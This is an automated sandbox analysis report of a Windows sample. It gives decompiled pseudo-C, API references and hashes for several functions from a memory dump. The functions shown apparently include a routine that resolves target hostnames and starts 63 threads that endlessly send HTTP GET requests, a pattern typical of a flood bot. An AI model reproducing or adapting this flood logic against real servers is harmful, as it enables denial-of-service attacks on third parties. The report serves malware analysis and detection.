Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID: @hhvPIhv0Ihv$>@
API String ID: 1823725401-470711940
Opcode ID: 6752a68771ff8c7a6e3c4476f7af6bbaa7c24de51bd96ab7512242724ea436f3
Instruction ID: debec2e65322a3b15bca312422c76589c54efe5470159b7dfb49874138d6f876
Opcode Fuzzy Hash: 6752a68771ff8c7a6e3c4476f7af6bbaa7c24de51bd96ab7512242724ea436f3
Instruction Fuzzy Hash: 6E31A1F29082156ED7207FB55C8483B769CE6C67587150A3FFB52E32C0E73A5C4186AA

Uniqueness

Uniqueness Score: -1.00%

Function 00401335 Relevance: 16.7, APIs: 11, Instructions: 196
networkCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E00401335(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				char _v24;
				void* _v28;
				void _v283;
				signed char _v284;
				signed char _v540;
				signed short _t94;
				signed short _t96;
				void* _t100;
				signed int _t103;
				intOrPtr _t109;
				void* _t115;
				void* _t128;
				void* _t129;
				short _t143;
				void* _t148;
				intOrPtr* _t149;
				signed int _t150;
				unsigned int _t152;
				unsigned int _t165;
				signed int _t166;
				signed int _t171;
				signed int _t172;
				void* _t176;
				char* _t177;
				char* _t183;
				intOrPtr _t184;
				void* _t185;
				void* _t186;
				void* _t187;
				void* _t188;

				_v284 = _v284 & 0x00000000;
				_t150 = 0x3f;
				memset( &_v283, 0, _t150 << 2);
				_t188 = _t187 + 0xc;
				_t184 = _a4;
				_t149 =  *0x407164;
				asm("stosw");
				_v8 = _v8 & 0x00000000;
				asm("stosb");
				_v12 =  *_t149( *((intOrPtr*)(_t184 + 6))) & 0x0000ffff;
				_t94 =  *_t149( *((intOrPtr*)(_t184 + 8)));
				_t96 =  *_t149( *((intOrPtr*)(_t184 + 0xa)));
				_t176 =  &_v284;
				_v16 = _v16 & 0x00000000;
				_v28 = _t176;
				_v24 = (_t96 & 0x0000ffff) + (_t94 & 0x0000ffff) + _v12;
				_t100 = _t184 + 0xc;
				goto L1;
				L9:
				_push( *((intOrPtr*)(_t184 + 6)));
				if( *_t149() == 0) {
					L11:
					return 0;
				}
				_t109 = E00401268(_v12);
				_a4 = _t109;
				if(_t109 != 0) {
					if(_v24 == 0) {
						L28:
						E004012AF(_a4);
						return _a4;
					} else {
						goto L13;
					}
					while(1) {
						L13:
						_v540 = _v540 & 0x00000000;
						_t115 = ( *_t149( *_t177) & 0x0000ffff) - 1;
						if(_t115 == 0) {
							_v20 =  *((intOrPtr*)(_t177 + 0xa));
							_push( *((intOrPtr*)(_t184 + 6)));
							if(_v8 < ( *_t149() & 0x0000ffff)) {
								E004039B0(_v8 * 0x204 + _a4 + 0x104,  *0x407190(_v20));
								_v8 = _v8 + 1;
							}
						} else {
							_t128 = _t115 - 1;
							if(_t128 != 0) {
								_t129 = _t128 - 3;
								if(_t129 == 0) {
									_t68 = _t177 + 0xa; // 0x1d
									E0040104E( &_v284, _t68, _t184);
									_t188 = _t188 + 0xc;
								} else {
									if(_t129 == 0xa) {
										_t52 = _t177 + 0xc; // 0x1f
										E0040104E( &_v540, _t52, _t184);
										_t188 = _t188 + 0xc;
										if(_v12 != 0) {
											_v20 = _v8 * 0x204 + _a4;
											E004039B0(_v8 * 0x204 + _a4 + 4,  &_v540);
											_t143 =  *_t149( *((intOrPtr*)(_t177 + 0xa)));
											_v8 = _v8 + 1;
											_t63 =  &_v12;
											 *_t63 = _v12 - 1;
											 *((short*)(_v20 + 2)) = _t143;
											if( *_t63 == 0) {
												_v8 = _v8 & 0x00000000;
											}
										}
									} else {
										_v24 = 1;
									}
								}
							}
						}
						_t81 =  &_v24;
						 *_t81 = _v24 - 1;
						if( *_t81 == 0) {
							goto L28;
						}
						_t177 = ( *_t149( *((intOrPtr*)(_t177 + 8))) & 0x0000ffff) + _t177 + 0xc;
						while( *_t177 != 0) {
							_t177 = _t177 + 1;
						}
					}
					goto L28;
				}
				goto L11;
				L1:
				_t152 =  *_t100;
				if(_t152 == 0) {
					if(E00403AA0( &_v284) != 0) {
						 *(_t186 + E00403AA0( &_v284) - 0x119) =  *(_t186 + _t146 - 0x119) & 0x00000000;
					}
					_t103 = _v16;
					_t38 = _t184 + 0x13; // 0x13
					_t177 = _t103 + _t38;
					_push( *((intOrPtr*)(_t103 + _t184 + 0x13)));
					if( *_t149() == 5) {
						_t41 =  &_v12;
						 *_t41 = _v12 - 1;
						if( *_t41 != 0) {
							 *((short*)(_t184 + 6)) =  *0x407168(_v12);
						}
					}
					goto L9;
				} else {
					_t165 = _t152;
					_t100 = _t100 + 1;
					_v20 = _t165;
					if(_t165 != 0) {
						_t172 = _t165;
						_t185 = _t100;
						_t166 = _t165 >> 2;
						memcpy(_t176, _t185, _t166 << 2);
						_t148 = memcpy(_t185 + _t166 + _t166, _t185, _t172 & 0x00000003);
						_t188 = _t188 + 0x18;
						_t171 = _t172;
						_v16 = _v16 + _t171;
						_t183 = _v28 + _t171;
						_t184 = _a4;
						_t100 = _t148 + _t171;
						 *_t183 = 0x2e;
						 *(_t183 + 1) =  *(_t183 + 1) & 0x00000000;
						_t176 = _t183 + 1;
						_v16 = _v16 + 1;
						_v28 = _t176;
					}
					goto L1;
				}
			}

0x0040133e
0x0040134c
0x00401353
0x00401353
0x00401355
0x00401358
0x0040135e
0x00401360
0x00401364
0x0040136f
0x00401377
0x00401381
0x00401388
0x00401391
0x00401395
0x00401398
0x0040139b
0x0040139b
0x0040142b
0x0040142f
0x00401435
0x00401447
0x00000000
0x00401447
0x0040143a
0x00401442
0x00401445
0x00401452
0x0040155b
0x0040155e
0x00000000
0x00000000
0x00000000
0x00000000
0x00401458
0x00401458
0x00401458
0x00401468
0x00401469
0x00401502
0x00401509
0x00401512
0x00401532
0x00401537
0x0040153b
0x0040146f
0x0040146f
0x00401470
0x00401476
0x00401479
0x004014e9
0x004014f5
0x004014fa
0x0040147b
0x0040147e
0x0040148c
0x00401498
0x0040149d
0x004014a4
0x004014be
0x004014c6
0x004014d2
0x004014d7
0x004014da
0x004014da
0x004014dd
0x004014e1
0x004014e3
0x004014e3
0x004014e1
0x00401480
0x00401480
0x00401480
0x0040147e
0x00401479
0x00401470
0x0040153c
0x0040153c
0x0040153f
0x00000000
0x00000000
0x0040154b
0x0040154f
0x00401558
0x00401558
0x0040154f
0x00000000
0x00401458
0x00000000
0x0040139e
0x0040139e
0x004013a2
0x004013ed
0x004013fb
0x00401403
0x00401404
0x00401407
0x00401407
0x00401410
0x00401417
0x00401419
0x00401419
0x0040141c
0x00401427
0x00401427
0x0040141c
0x00000000
0x004013a4
0x004013a4
0x004013a7
0x004013a8
0x004013ad
0x004013af
0x004013b1
0x004013b3
0x004013b6
0x004013bd
0x004013bd
0x004013c2
0x004013c4
0x004013c7
0x004013c9
0x004013cc
0x004013ce
0x004013d1
0x004013d5
0x004013d6
0x004013d9
0x004013d9
0x00000000
0x004013ad

APIs

htons.WS2_32(?), ref: 0040136A
htons.WS2_32(00002AF8), ref: 00401377
htons.WS2_32(?), ref: 00401381
htons.WS2_32(?), ref: 00401411
htons.WS2_32(00000000), ref: 00401421
htons.WS2_32(?), ref: 00401430
htons.WS2_32(00000000), ref: 00401463
htons.WS2_32(?), ref: 004014D2
htons.WS2_32(?), ref: 00401546

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: htons
String ID:
API String ID: 4207154920-0
Opcode ID: 48a45a940a450e98c152e899dabb52d29e34b7f83406fa04ff797be4d52d6c27
Instruction ID: 7c00ff9ec1ea4cf75777973c030583b57a69d43a9a0a8a82c05b148ff9ca7bec
Opcode Fuzzy Hash: 48a45a940a450e98c152e899dabb52d29e34b7f83406fa04ff797be4d52d6c27
Instruction Fuzzy Hash: A661D57A804209ABCB14DFA4C8457EEBBB4FF04314F50406BE506B76A1DB7CDA85CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00403429 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55
threadsleepstringCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00403429(void* __edx, void* __eflags, signed int _a4) {
				char _v260;
				char _v772;
				void* _t25;
				signed int _t29;
				void* _t31;

				SetThreadPriority(GetCurrentThread(), 0xffffffff);
				_t29 = _a4;
				_push(0);
				_push( *((intOrPtr*)(0x409098 + _t29 * 4)));
				E00401BAD( &_v260);
				_push( &_v260);
				wsprintfA( &_v772, "GET / HTTP/1.1Host: %s");
				if(_t29 != 0) {
					_t7 = (_t29 << 4) + 0x5c9850; // 0x5c9850
					_t25 = _t7;
					L3:
					_t31 = E004034D5(_t25, 8);
					if(_t31 != 0) {
						 *0x407158(_t31,  &_v772,  *0x407024( &_v772, 0));
						Sleep(0xfa);
						 *0x40718c(_t31);
					}
					goto L3;
				}
				_push(_t29);
				RtlExitUserThread();
				return 0;
			}

0x0040343d
0x00403443
0x00403446
0x0040344e
0x00403456
0x00403461
0x0040346e
0x00403479
0x0040348d
0x0040348d
0x00403493
0x0040349b
0x004034a1
0x004034bb
0x004034c6
0x004034cd
0x004034cd
0x00000000
0x004034a1
0x0040347b
0x0040347c
0x00403487

APIs

GetCurrentThread.KERNEL32 ref: 00403436
SetThreadPriority.KERNEL32(00000000), ref: 0040343D

Part of subcall function 00401BAD: lstrcpy.KERNEL32(?,005C99A4), ref: 00401BB9

wsprintfA.USER32 ref: 0040346E
RtlExitUserThread.NTDLL(00000000), ref: 0040347C
lstrlen.KERNEL32(?,00000000), ref: 004034AC
send.WS2_32(00000000,?,00000000), ref: 004034BB
Sleep.KERNEL32(000000FA), ref: 004034C6
closesocket.WS2_32(00000000), ref: 004034CD

Strings

GET / HTTP/1.1Host: %s, xrefs: 00403468

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: Thread$CurrentExitPrioritySleepUserclosesocketlstrcpylstrlensendwsprintf
String ID: GET / HTTP/1.1Host: %s
API String ID: 226158632-3010088167
Opcode ID: 008bb558a40e8ea1fa8a837acc4300954933fb2b068ce00e9c0013009b88e5ca
Instruction ID: efe6e8e59ef2774c756b3457fcfb894544b2bb5a198eded933ca244c7cf8ce0e
Opcode Fuzzy Hash: 008bb558a40e8ea1fa8a837acc4300954933fb2b068ce00e9c0013009b88e5ca
Instruction Fuzzy Hash: 21118636C04128ABD712AFE09D08FDB376CAB05311F040176FA06F61D1D738BA448BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00405ADF Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 50libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404CE1,?,Microsoft Visual C++ Runtime Library,00012010,?,00407824,?,00407874,?,?,?,Runtime Error!Program: ), ref: 00405AF1
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405B09
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00405B1A
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00405B27

Strings

user32.dll, xrefs: 00405AEC
tx@, xrefs: 00405B4D, 00405B51
GetActiveWindow, xrefs: 00405B14
MessageBoxA, xrefs: 00405B03
GetLastActivePopup, xrefs: 00405B1C

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$tx@$user32.dll
API String ID: 2238633743-1364007602
Opcode ID: f8e7637a83fb1561e80acd05eff2288d566afc5217790a07b4446b630f84f1db
Instruction ID: b408048694ca781b138cded4aee97951905855190c306175c5cc8b0f894f02a0
Opcode Fuzzy Hash: f8e7637a83fb1561e80acd05eff2288d566afc5217790a07b4446b630f84f1db
Instruction Fuzzy Hash: C3017532A08F05FFC7109FB5AC88D17BAE8E658754304003BA104E2190D778FC04EF29

Uniqueness

Uniqueness Score: -1.00%

Function 004034D5 Relevance: 15.1, APIs: 10, Instructions: 96networksleepCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 004034E9
ioctlsocket.WS2_32(00000000,8004667E,00000008), ref: 00403521
connect.WS2_32(00000000,00000000,00000010), ref: 00403533
WSAGetLastError.WS2_32 ref: 00403541
Sleep.KERNEL32(0000002D), ref: 00403553
select.WS2_32(00000001,00000000,?,?,0040349B), ref: 00403598
__WSAFDIsSet.WS2_32(00000000,?), ref: 004035B2
__WSAFDIsSet.WS2_32(00000000,?), ref: 004035C3
ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 004035DA
closesocket.WS2_32(00000000), ref: 004035E5

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: ioctlsocket$ErrorLastSleepclosesocketconnectselectsocket
String ID:
API String ID: 3016611618-0
Opcode ID: d1e230be99870431fc2806d5567bc2a6e1f79b904c044206a6d08a29f4286e70
Instruction ID: f531a37a0a2a5bc4af10f7e1f4724e2060060b77b23b4d6fb4d987f5dbda4f0e
Opcode Fuzzy Hash: d1e230be99870431fc2806d5567bc2a6e1f79b904c044206a6d08a29f4286e70
Instruction Fuzzy Hash: 8331AEB1C04118BBDB219FA58D48BEEBABCEB08315F1001B7F515F62D0D7789B458BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404BBD Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00404BBD(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t41;
				long _t46;
				void* _t47;
				signed int _t53;
				void** _t55;
				void* _t56;

				_t47 = __edi;
				_t46 = _a4;
				_t41 = 0;
				_t17 = 0x40a278;
				while(_t46 !=  *_t17) {
					_t17 = _t17 + 8;
					_t41 = _t41 + 1;
					if(_t17 < 0x40a308) {
						continue;
					}
					break;
				}
				_t53 = _t41 << 3;
				_t2 = _t53 + 0x40a278; // 0x24000000
				if(_t46 ==  *_t2) {
					_t17 =  *0x5c99b0; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x409fb4 == 1) {
						_t16 = _t53 + 0x40a27c; // 0x407824
						_t55 = _t16;
						_t19 = E00403AA0( *_t55);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t55, _t19,  &_a4, 0);
					} else {
						if(_t46 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E004039B0( &_v424, "<program name unknown>");
							}
							_push(_t47);
							_t48 =  &_v424;
							if(E00403AA0( &_v424) + 1 > 0x3c) {
								_t48 = E00403AA0( &_v424) +  &_v424 - 0x3b;
								E00403CD0(E00403AA0( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t56 = _t56 + 0x10;
							}
							E004039B0( &_v164, "Runtime Error!Program: ");
							E004039C0( &_v164, _t48);
							E004039C0( &_v164, 0x407874);
							_t12 = _t53 + 0x40a27c; // 0x407824
							E004039C0( &_v164,  *_t12);
							_t17 =  &_v164;
							0x405adf(_t17, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}

0x00404bbd
0x00404bc6
0x00404bc9
0x00404bcb
0x00404bd0
0x00404bd4
0x00404bd7
0x00404bdd
0x00000000
0x00000000
0x00000000
0x00404bdd
0x00404be2
0x00404be5
0x00404beb
0x00404bf1
0x00404bf9
0x00404cea
0x00404cea
0x00404cf5
0x00404d07
0x00404c10
0x00404c16
0x00404c32
0x00404c40
0x00404c46
0x00404c4d
0x00404c4f
0x00404c5f
0x00404c7a
0x00404c82
0x00404c87
0x00404c87
0x00404c96
0x00404ca3
0x00404cb4
0x00404cb9
0x00404cc6
0x00404cd0
0x00404cdc
0x00404ce4
0x00404c16
0x00404bf9
0x00404d0f

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404C2A
GetStdHandle.KERNEL32(000000F4,00407824,00000000,?,00000000,00000000), ref: 00404D00
WriteFile.KERNEL32(00000000), ref: 00404D07

Strings

..., xrefs: 00404C7C
<program name unknown>, xrefs: 00404C3A
Runtime Error!Program: , xrefs: 00404C90
Microsoft Visual C++ Runtime Library, xrefs: 00404CD6

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: c95b60a3474ca911a1b02898e91c9e045f4f6927d9e915d3d3a8e44d8715fa6d
Instruction ID: 8e9997ce98f7218f9be022988e6ed306dd5e2adedba91b3199aec000612676f1
Opcode Fuzzy Hash: c95b60a3474ca911a1b02898e91c9e045f4f6927d9e915d3d3a8e44d8715fa6d
Instruction Fuzzy Hash: 3231C8B2A052089EEF20EB61DD45F9A376CEB85304F1005BBF545F61C0E778EA44CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 00405574 Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,004078B0,00000001,00000000,?,00000100,00000000,004059DD,00000001,00000020,00000100,?,00000000), ref: 004055B3
GetStringTypeA.KERNEL32(00000000,00000001,005C99A4,00000001,00000000,?,00000100,00000000,004059DD,00000001,00000020,00000100,?,00000000), ref: 004055CD
GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,004059DD,00000001,00000020,00000100,?,00000000), ref: 00405601
MultiByteToWideChar.KERNEL32(004059DD,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,004059DD,00000001,00000020,00000100,?,00000000), ref: 00405639
MultiByteToWideChar.KERNEL32(004059DD,00000001,00000100,00000020,?,00000100,?,00000100,00000000,004059DD,00000001,00000020,00000100,?), ref: 0040568F
GetStringTypeW.KERNEL32(?,?,00000000,00000001,?,00000100,?,00000100,00000000,004059DD,00000001,00000020,00000100,?), ref: 004056A1

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: StringType$ByteCharMultiWide
String ID:
API String ID: 3852931651-0
Opcode ID: 833fee67bfced79861695937718b4eacd2c565fa5f16f4d08fdef29b7bf25f1d
Instruction ID: 9ff12388c56d175fdb0ce3a8b45c706a0ca96ca28aa7f41e6ab03507a26b157f
Opcode Fuzzy Hash: 833fee67bfced79861695937718b4eacd2c565fa5f16f4d08fdef29b7bf25f1d
Instruction Fuzzy Hash: 3E416D72A00609BFCF209F94DD85EAB7F79FB04714F204936F905E2290C73999509FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403331 Relevance: 9.1, APIs: 6, Instructions: 88
networksleepstringCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00403331() {
				char _v256;
				char _v384;
				char _v392;
				long _v408;
				long _v412;
				signed int _t32;
				signed int _t36;
				void* _t39;
				intOrPtr* _t40;
				signed int _t41;
				signed int _t42;
				void* _t47;
				short* _t48;
				void* _t49;
				void* _t51;

				_t51 =  &_v392;
				_t48 = 0x5c9850;
				_t40 = 0x409098;
				do {
					E00401BAD( &_v256);
					_t51 = _t51 + 0xc;
					 *0x407034( &_v384,  &_v256,  *_t40, 0);
					_t47 =  *0x407174( &_v392);
					if(_t47 != 0) {
						E00403600(_t48, 0, 0x10);
						 *_t48 = 2;
						_t51 = _t51 + 0xc;
						 *((intOrPtr*)(_t48 + 4)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t47 + 0xc))))));
						 *((short*)(_t48 + 2)) =  *0x407168(0x50);
					} else {
						 *((short*)(_t48 + 2)) = 0;
					}
					_t40 = _t40 + 4;
					_t48 = _t48 + 0x10;
				} while (_t40 < 0x4090a4);
				_v408 = 0;
				if(InternetGetConnectedState( &_v408, 0) == 0) {
					L6:
					Sleep(0x4e20);
					goto L6;
				}
				_t49 = 0x3f;
				do {
					_t32 = E00401BE1();
					asm("cdq");
					_t41 = 5;
					CreateThread(0, 0, E00403429, _t32 % _t41, 0,  &_v412);
					_t49 = _t49 - 1;
					__eflags = _t49;
				} while (_t49 != 0);
				_t36 = E00401BE1();
				asm("cdq");
				_t42 = 5;
				_t46 = (_t36 % _t42 << 4) + 0x5c9850;
				__eflags = (_t36 % _t42 << 4) + 0x5c9850;
				E00403429(_t46, (_t36 % _t42 << 4) + 0x5c9850, _t46);
				_t39 = 1;
				return _t39;
			}

0x00403331
0x0040333b
0x00403340
0x00403347
0x00403352
0x00403357
0x00403367
0x00403378
0x0040337c
0x00403388
0x0040338d
0x00403395
0x0040339e
0x004033a7
0x0040337e
0x0040337e
0x0040337e
0x004033ab
0x004033ae
0x004033b1
0x004033bf
0x004033cb
0x004033cd
0x004033d2
0x00000000
0x004033d2
0x004033dc
0x004033dd
0x004033dd
0x004033e4
0x004033e5
0x004033f6
0x004033fc
0x004033fc
0x004033fc
0x004033ff
0x00403406
0x00403407
0x0040340d
0x0040340d
0x00403414
0x0040341b
0x00403426

APIs

Part of subcall function 00401BAD: lstrcpy.KERNEL32(?,005C99A4), ref: 00401BB9

lstrcpy.KERNEL32(?,?), ref: 00403367
gethostbyname.WS2_32(?), ref: 00403372
htons.WS2_32(00000050), ref: 004033A1
InternetGetConnectedState.WININET(?,00000000), ref: 004033C3
Sleep.KERNEL32(00004E20), ref: 004033D2
CreateThread.KERNEL32(00000000,00000000,00403429,?,00000000,?), ref: 004033F6

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: lstrcpy$ConnectedCreateInternetSleepStateThreadgethostbynamehtons
String ID:
API String ID: 1402143177-0
Opcode ID: 2fd68c0aa8a2eaa32fa91ce1913bccd11d8bfbb808360e9ccad4e298f5aab143
Instruction ID: 3e35b5bb7f05344f8615c998f5cb386695659bc1bf4519f308c39302bcc4d726
Opcode Fuzzy Hash: 2fd68c0aa8a2eaa32fa91ce1913bccd11d8bfbb808360e9ccad4e298f5aab143
Instruction Fuzzy Hash: 7021B572944304ABD310AFA1EC86F5B7BACEB45305F00443EFA05F62D1DB7AB50487AA

Uniqueness

Uniqueness Score: -1.00%

Function 004047CC Relevance: 7.6, APIs: 5, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E004047CC() {
				signed int* _t35;
				signed int* _t37;
				long _t42;
				signed int _t44;
				signed int _t45;
				int _t46;
				void* _t48;
				void** _t52;
				int _t53;
				int _t54;
				signed int* _t55;
				int _t57;
				void** _t58;
				signed char _t60;
				signed int _t62;
				void* _t66;
				void* _t69;
				signed int _t70;
				int* _t71;
				signed int* _t72;
				void** _t73;
				int _t74;
				intOrPtr* _t75;
				void* _t76;

				_t72 = E00403F9E(0x100);
				if(_t72 == 0) {
					E00403F55(0x1b);
				}
				 *0x5c9dc0 = _t72;
				 *0x5c9ec0 = 0x20;
				_t1 =  &(_t72[0x40]); // 0x100
				_t35 = _t1;
				while(_t72 < _t35) {
					_t72[1] = _t72[1] & 0x00000000;
					 *_t72 =  *_t72 | 0xffffffff;
					_t72[1] = 0xa;
					_t55 =  *0x5c9dc0; // 0x2290ef0
					_t72 =  &(_t72[2]);
					_t35 =  &(_t55[0x40]);
				}
				GetStartupInfoA(_t76 + 0x10);
				__eflags =  *((short*)(_t76 + 0x42));
				if( *((short*)(_t76 + 0x42)) == 0) {
					L25:
					_t57 = 0;
					__eflags = 0;
					do {
						_t37 =  *0x5c9dc0; // 0x2290ef0
						__eflags =  *(_t37 + _t57 * 8) - 0xffffffff;
						_t73 = _t37 + _t57 * 8;
						if( *(_t37 + _t57 * 8) != 0xffffffff) {
							_t32 =  &(_t73[1]);
							 *_t32 = _t73[1] | 0x00000080;
							__eflags =  *_t32;
							goto L37;
						}
						__eflags = _t57;
						_t73[1] = 0x81;
						if(_t57 != 0) {
							asm("sbb eax, eax");
							_t42 =  ~(_t57 - 1) + 0xfffffff5;
							__eflags = _t42;
						} else {
							_t42 = 0xfffffff6;
						}
						_t69 = GetStdHandle(_t42);
						__eflags = _t69 - 0xffffffff;
						if(_t69 == 0xffffffff) {
							L33:
							_t73[1] = _t73[1] | 0x00000040;
						} else {
							_t44 = GetFileType(_t69);
							__eflags = _t44;
							if(_t44 == 0) {
								goto L33;
							}
							_t45 = _t44 & 0x000000ff;
							 *_t73 = _t69;
							__eflags = _t45 - 2;
							if(_t45 != 2) {
								__eflags = _t45 - 3;
								if(_t45 == 3) {
									_t73[1] = _t73[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t57 = _t57 + 1;
						__eflags = _t57 - 3;
					} while (_t57 < 3);
					return SetHandleCount( *0x5c9ec0);
				}
				_t46 =  *(_t76 + 0x44);
				__eflags = _t46;
				if(_t46 == 0) {
					goto L25;
				}
				_t74 =  *_t46;
				_t75 = _t46 + 4;
				__eflags = _t74 - 0x800;
				_t58 = _t74 + _t75;
				if(_t74 >= 0x800) {
					_t74 = 0x800;
				}
				__eflags =  *0x5c9ec0 - _t74; // 0x20
				if(__eflags >= 0) {
					L18:
					_t70 = 0;
					__eflags = _t74;
					if(_t74 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t48 =  *_t58;
						__eflags = _t48 - 0xffffffff;
						if(_t48 == 0xffffffff) {
							goto L24;
						}
						_t60 =  *_t75;
						__eflags = _t60 & 0x00000001;
						if((_t60 & 0x00000001) == 0) {
							goto L24;
						}
